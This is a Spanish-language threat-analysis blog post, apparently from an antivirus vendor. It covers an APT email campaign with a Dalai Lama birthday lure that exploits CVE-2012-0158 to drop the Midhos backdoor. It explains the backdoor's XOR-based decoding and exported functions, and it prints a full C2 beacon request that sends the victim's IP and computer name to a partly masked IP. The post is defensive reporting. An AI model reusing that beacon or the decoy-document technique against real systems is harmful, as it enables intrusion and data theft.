Un regalo de cumpleaños para el Dalai Lama

Hace poco escribimos un artículo sobre el Dalai Lama en el que decíamos que es un usuario frecuente de Mac. Aunque esta afirmación sobre su eminencia es cierta, no todos sus seguidores utilizan Mac.
Seguro te estás preguntando… ¿qué importancia tiene esto? Pues bien, el 6 de julio, su eminencia cumplirá 77 años. No es ninguna sorpresa que los ataques sobre el “Cumpleaños del Dalai Lama” ya hayan comenzado.

El 3 de julio descubrimos una nueva campaña APT llamada “El 6 de julio, el cumpleaños del Dalai Lama será un acontecimiento discreto”:

Adjunto al correo electrónico había un archivo .DOC que explotaba CVE-2012-0158, algo muy común en estos ataques. (ver Nuevo ataque APT muestra el avance técnico en el desarrollo de exploits)

Esta vez, el exploit es para ordenadores Windows.

El shellcode x86 en el archivo .DOC decodifica el cuerpo de la puerta trasera principal en bloques de 1 KB con una simple cifra “xor pos + ror 3”:

Al decodificarlo, se guarda en el disco como “CONIME.EXE”. Después descarga un DLL (CONIME.DLL) y un archivo de configuración (CONIME.INF). Detectamos ambos componentes como Trojan.Win32.Midhos:

Detectamos CONIME.dll como Trojan.Win32.Midhos.fuy

Detectamos CONIME.exe como Trojan.Win32.Midhos.fuz

El DLL implementa la principal funcionalidad de puerta trasera mediante tres funciones exportadas:

• ComunicateToClient (comunicarse con el cliente)
• InstallProgram (instalar programa)
• RunProgram (ejecutar programa)

Como en otros casos, el archivo de configuración de la puerta trasera (CONIME.INF) está cifrado:

El algoritmo de codificación aquí es diferente; es un bucle que ejecuta un XOR con una llave variable.

Se puede leer el “config” de la puerta trasera cuando se lo decodifica:

La dirección del servidor de Comando y Control (61.178.77*) es exactamente la misma que se usó en un ataque que ya habíamos analizado. (ver Nueva variante de puerta trasera MacOS X en ataques APT).

La puerta trasera trata de conectarse al C2 vía HTTP en el puerto 1080, a un módulo del lado del servidor llamado WinData{UWXYZ}.Dll:

Esta es una solicitud HTTP completa:

GET http://61.178.77.*:1080/WinData1158.Dll?HELO-STX-2*IP_ADDR*COMPUTERNAME*$ HTTP/1.0

Como respuesta, el servidor envía paquetes codificados con comandos a la puerta trasera.

Cuando el exploit tiene éxito, se muestra un documento “falso” que contiene un artículo extraído del periódico indio “The Tribune, Chandigarh”. El artículo original es de “Lalit Mohan”:

Conclusión

Las personalidades importantes como Tenzin Gyatso , el actual Dalai Lama, son objetivos constantes de los atacantes APT. Predecimos que estos ataques se intensificarán mientras más se acerque el 6 de julio, el día del 77^o cumpleaños del Dalai Lama.
El mes pasado hubo casi 500 intentos de infección de Trojan.Win32.Midhos, una familia de puertas traseras que utiliza este tipo de atacantes APT en particular.

La gran mayoría de las víctimas se encuentra en los Estados Unidos, Italia, Canadá, el Reino Unido y Alemania.

Ya habíamos dicho que muchos de estos ataques APT (Amenaza Persistente Avanzada) no son exactamente “avanzados”. Muchas veces tampoco son tan “persistentes”– los productos antivirus los detectan muy pronto y los eliminan de los sistemas.

Pero hay algo que sí son sin duda alguna: insistentes.